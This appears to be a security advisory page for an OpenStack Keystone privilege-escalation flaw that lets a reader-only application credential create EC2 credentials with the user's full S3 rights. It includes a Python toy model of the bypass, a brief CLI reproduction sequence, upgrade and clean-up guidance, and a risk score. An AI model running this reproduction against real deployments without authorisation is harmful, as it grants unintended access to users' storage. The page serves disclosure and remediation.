OpenStack Keystone EC2 Credential Creation Privilege Escalation Vulnerability

Vulnerability

A vulnerability exists in OpenStack Keystone versions 14 through 26 prior to 26.1.1, and in versions 27.0.0, 28.0.0, and 29.0.0. Keystone does not stop a token obtained from a restricted application credential from creating EC2 credentials. An authenticated user holding an application credential restricted to the reader role can call the EC2 credential creation API and receive an EC2/S3 access key and secret. EC2 credentials are bound to the user and project rather than to the application credential's reduced role set, so the resulting credential carries the user's full S3 permissions. This bypasses the role restrictions of the application credential. Deployments are affected when they use restricted application credentials together with the EC2/S3 compatibility API (swift3/s3api).

Impact

Exploitation of this vulnerability allows the holder of a restricted application credential to create EC2 credentials and gain full access to the user's S3 buckets, bypassing the role restrictions the application credential was meant to enforce.

Reproduction

To reproduce this vulnerability, create an application credential restricted to the reader role in OpenStack Keystone, authenticate with it, and call the EC2 credential creation API. The returned EC2 credential carries the user's full S3 permissions, so it can, for example, create S3 buckets under the user's account even though the application credential it was created from only holds the reader role.
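The following Python model shows the escalation described in the Vulnerability and Reproduction sections side by side with the behaviour of a fixed release. It is an added example written for this page, not Keystone's own code: the class and function names (ApplicationCredential, Token, KeystoneModel, escalate, can_create_bucket), the sample user "alice" with admin, member and reader on project "P", and the block_restricted_app_creds switch are all assumptions made for the illustration. The vulnerable path mints an EC2 credential from a reader-only application credential and then shows that a token derived from that EC2 credential carries the user's full role set; the hardened path refuses the creation.

```python
"""Toy model of the Keystone EC2 credential role-restriction bypass.

Illustrative code written for this page; not Keystone's implementation.
All names and the sample data below are assumptions made for the example.
"""
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, Optional, Tuple
import secrets


class Forbidden(Exception):
    """Raised where a real Keystone would answer HTTP 403."""


@dataclass(frozen=True)
class ApplicationCredential:
    id: str
    user_id: str
    project_id: str
    roles: FrozenSet[str]          # subset of the user's roles on the project
    unrestricted: bool = False     # restricted app creds should not mint new credentials


@dataclass(frozen=True)
class Token:
    user_id: str
    project_id: str
    roles: FrozenSet[str]
    app_cred: Optional[ApplicationCredential] = None   # set when issued from an app cred


@dataclass
class KeystoneModel:
    # Constructed sample data: one user holding admin, member and reader on project P.
    user_roles: Dict[Tuple[str, str], FrozenSet[str]] = field(
        default_factory=lambda: {("alice", "P"): frozenset({"admin", "member", "reader"})}
    )
    ec2_credentials: Dict[str, Tuple[str, str, str]] = field(default_factory=dict)
    # False models the vulnerable releases; True models the fixed behaviour.
    block_restricted_app_creds: bool = False

    def token_from_app_cred(self, ac: ApplicationCredential) -> Token:
        # A token issued from an application credential only carries the app cred's roles.
        return Token(ac.user_id, ac.project_id, ac.roles, app_cred=ac)

    def create_ec2_credential(self, token: Token) -> str:
        # Hardened check: a restricted application credential must not create EC2 credentials.
        if (self.block_restricted_app_creds
                and token.app_cred is not None
                and not token.app_cred.unrestricted):
            raise Forbidden("restricted application credentials may not create EC2 credentials")
        access = secrets.token_hex(16)
        # EC2 credentials are stored against the user and project, not against the app cred.
        self.ec2_credentials[access] = (token.user_id, token.project_id, secrets.token_hex(20))
        return access

    def token_from_ec2_credential(self, access: str) -> Token:
        # Authenticating with the EC2 credential yields the user's full roles on the project.
        user_id, project_id, _secret = self.ec2_credentials[access]
        return Token(user_id, project_id, self.user_roles[(user_id, project_id)])


def can_create_bucket(token: Token) -> bool:
    # Assumption for the model: bucket creation via s3api needs more than the reader role.
    return "member" in token.roles or "admin" in token.roles


def escalate(block_restricted_app_creds: bool) -> Tuple[bool, list]:
    """Run the reproduction; returns (bucket creation allowed, roles on the EC2-derived token)."""
    ks = KeystoneModel(block_restricted_app_creds=block_restricted_app_creds)
    reader_only = ApplicationCredential("ac-1", "alice", "P", frozenset({"reader"}))
    app_token = ks.token_from_app_cred(reader_only)
    assert not can_create_bucket(app_token)          # the app cred alone cannot write
    access = ks.create_ec2_credential(app_token)     # Forbidden on a fixed release
    ec2_token = ks.token_from_ec2_credential(access)
    return can_create_bucket(ec2_token), sorted(ec2_token.roles)


if __name__ == "__main__":
    print("vulnerable:", escalate(False))
    try:
        escalate(True)
    except Forbidden as exc:
        print("fixed:", exc)
```

Against a live deployment the same sequence is `openstack application credential create --role reader <name>`, authentication with `OS_AUTH_TYPE=v3applicationcredential`, then `openstack ec2 credentials create`, followed by an S3 client pointed at the swift3/s3api endpoint with the returned access and secret. The model's `escalate(False)` mirrors that outcome on an unpatched Keystone; `escalate(True)` shows the refusal a fixed release should return.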

Remediation

Users can upgrade to OpenStack Keystone versions 26.1.1, 27.0.1, 28.0.1, or 29.0.1, where this vulnerability has been fixed. Upgrading blocks new EC2 credential creation from restricted application credentials; it does not revoke EC2 credentials that were already created this way, so operators should review existing EC2 credentials (`openstack ec2 credentials list`) and delete any that a restricted application credential should not have been able to obtain.

Added: Apr 10, 2026, 3:27 AM
Updated: Apr 10, 2026, 3:27 AM

Vulnerability Rating

Custom Algorithm
spread         3.1
impact         5.0
exploitability 6.2
remediation    7.7
relevance      5.6
threat         6.4
urgency        2.9
incentive      0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.